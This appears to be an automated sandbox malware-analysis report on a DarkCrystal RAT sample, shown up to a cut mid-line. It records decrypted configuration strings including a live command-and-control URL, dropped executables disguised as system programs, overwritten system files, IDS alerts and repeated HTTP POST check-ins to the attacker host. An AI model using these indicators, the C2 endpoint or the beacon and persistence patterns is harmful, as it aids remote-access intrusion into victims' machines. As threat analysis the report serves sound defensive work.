Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Joe Sandbox ML: detected
Source: C:\Recovery\ctfmon.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\CdEzwRtl.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: VIyu4dC9CU.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1299899215.000000001352C000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-9i5llWSDsSpUTw8pYfrW","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
Source: 00000000.00000002.1299899215.000000001352C000.00000004.00000800.00020000.00000000.sdmp	String decryptor: [["http://480344cm.renyash.ru/","lineSecureUpdateprocessdefaultTestPublicUploadsTemporary"]]

Source: VIyu4dC9CU.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Directory created: C:\Program Files\Windows Sidebar\Gadgets\TDdwNhXdQzDImnznNSm.exe	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Directory created: C:\Program Files\Windows Sidebar\Gadgets\7d63bcb2074184	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Directory created: C:\Program Files\Google\Chrome\TDdwNhXdQzDImnznNSm.exe	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Directory created: C:\Program Files\Google\Chrome\7d63bcb2074184	Jump to behavior

Source: VIyu4dC9CU.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\xml2dols\xml2dols.pdb source: VIyu4dC9CU.exe, 00000000.00000002.1296943431.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\gsjdpjdw\gsjdpjdw.pdb source: VIyu4dC9CU.exe, 00000000.00000002.1296943431.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: ctfmon.exe, 00000013.00000002.1430228599.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, VIyu4dC9CU.exe, 0000002F.00000002.1920621978.000000001AF70000.00000004.00000020.00020000.00000000.sdmp, sppsvc.exe, 00000038.00000002.1844383709.000000000123B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb9 source: ctfmon.exe, 00000013.00000002.1468436451.000000001B2CC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb&+ source: ctfmon.exe, 00000013.00000002.1468436451.000000001B2CC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: ctfmon.exe, 00000013.00000002.1430228599.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, VIyu4dC9CU.exe, 0000002F.00000002.1920621978.000000001AF70000.00000004.00000020.00020000.00000000.sdmp, sppsvc.exe, 00000038.00000002.1844383709.000000000123B000.00000004.00000020.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe			Jump to behavior

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49744 -> 172.67.220.198:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49785 -> 172.67.220.198:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49919 -> 172.67.220.198:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49976 -> 172.67.220.198:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49974 -> 172.67.220.198:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49961 -> 172.67.220.198:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49975 -> 172.67.220.198:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49977 -> 172.67.220.198:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: POST /lineSecureUpdateprocessdefaultTestPublicUploadsTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 480344cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /lineSecureUpdateprocessdefaultTestPublicUploadsTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 480344cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /lineSecureUpdateprocessdefaultTestPublicUploadsTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 480344cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /lineSecureUpdateprocessdefaultTestPublicUploadsTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 480344cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /lineSecureUpdateprocessdefaultTestPublicUploadsTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 480344cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /lineSecureUpdateprocessdefaultTestPublicUploadsTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 480344cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /lineSecureUpdateprocessdefaultTestPublicUploadsTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 480344cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /lineSecureUpdateprocessdefaultTestPublicUploadsTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 480344cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: 480344cm.renyash.ru

Source: unknown

HTTP traffic detected: POST /lineSecureUpdateprocessdefaultTestPublicUploadsTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 480344cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 12 Jan 2025 00:07:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iHiSExB2QWeaJ5eaD9B4akOSg6ImQ1nNSmVF7GDB1FiChDUeO0BOLGff67iin%2FuMk1OdiPEFsSlDKAcaOJR5plCeg81O%2FpwpwgxeWe9G46z%2FQcHZSxezuD2PqaBmbtzuYmpZeL%2B8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9008e7ca09784259-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=4757&min_rtt=1594&rtt_var=6923&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=658&delivery_rate=54279&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 12 Jan 2025 00:07:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FlzlWj79i8TZLKboIG%2BEPRZFperCAJT5R2dKtt6Y0JbC9V%2FP8LrERrfejQ0dvaR9Y1Vf9TjxBZu51X1%2BF2ks1roI1MVz3klIEiE3m3VX9fhnhM69mWbKWxLyIAnMfHtuZD3TJv5S"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9008e7f2fc907271-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4688&min_rtt=2008&rtt_var=6113&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=694&delivery_rate=62257&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 12 Jan 2025 00:07:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DJc5wj2lfMoD8DpFgmKY48ElFhTe4WtGVt2ZPWvDtEgz52d08YbEOQpGC0MhBsJBTGJYJbRUDpkf959cdiHfoEGcXB7rVnFXvgJEUJ7JfV%2FFnjaU4MbTN9ZhHQ5qMtxFGyWOHVSm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9008e8905a018ccc-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3708&min_rtt=1948&rtt_var=4251&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=711&delivery_rate=91079&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 12 Jan 2025 00:07:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uBE180C8CPHP2uEmh55gn8lAFXWJjx3N8mQ77oX%2FXOhl6%2FHbh%2F0pHh8ZZoHl17IUv3M4WUbaHWEPgzj4krWqf60z6%2F5x67TTn1PbDB2WgnwL6Zt4GVyAGfMz0unvS0biICBNHsGQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9008e8c5cbd1de98-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=3941&min_rtt=1639&rtt_var=5220&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=646&delivery_rate=72774&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 12 Jan 2025 00:08:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1veL%2BvL5t7%2Fka02OnGC22r3%2B3r%2FWO9J7RL3BSn%2BcPyPuU43APMIogIlQvpXZGrPybX6Qw59234yPCGzo0tWUHLgmma1ofp44Lze1gNGcuzjAh5TzoHCLZmLHfO8S03Hx3i2cPunM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9008e8e22d401885-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2477&min_rtt=1684&rtt_var=2217&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=711&delivery_rate=181840&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 12 Jan 2025 00:08:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z6nz7QmNTYtI0ReezHybO9bQptEclSEmPJSCjKn4b3ddMXJ%2BETZ611TUm1d7ohqhhJrFS%2Fybdu1bEpUBFiUhhH73aFErvCn%2F%2BTPj9QZYd4MyXiQsIRACdO3qf4Zt1UW4HKfz%2BCLK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9008e9889f6b8cd7-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=8545&min_rtt=2068&rtt_var=13730&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=658&delivery_rate=27094&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 12 Jan 2025 00:08:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jqyp%2FQUecdIKjErhxusLxdmk08BagoUzOyx0hwedft%2F2LVQjCjvkH06V%2FLirgeptU%2BmXb1j0B%2FK85sOqGZA0P59gTY%2FG4AGcCLBQxn7lcafjass%2BWvyToC9u%2Bat5R0rqDrmJvutt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9008e9bd7fb9437f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1741&min_rtt=1663&rtt_var=780&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=638111&cwnd=78&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 12 Jan 2025 00:09:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lxg2EPhEQIV7Dsm8PLAsYkwrew0T5tPipqOy14h2ILIU1ZItHDJ5XTxQuF2JkzylTD7W257r%2BMq1r6WVXitXJk9b%2FSEFUSCbLfvfDf0u9Aaq7b12Iu9zjx6Vn2EexQbDDeXJ2vUb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9008ea55acc74325-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2365&min_rtt=1603&rtt_var=2126&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=694&delivery_rate=189561&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; 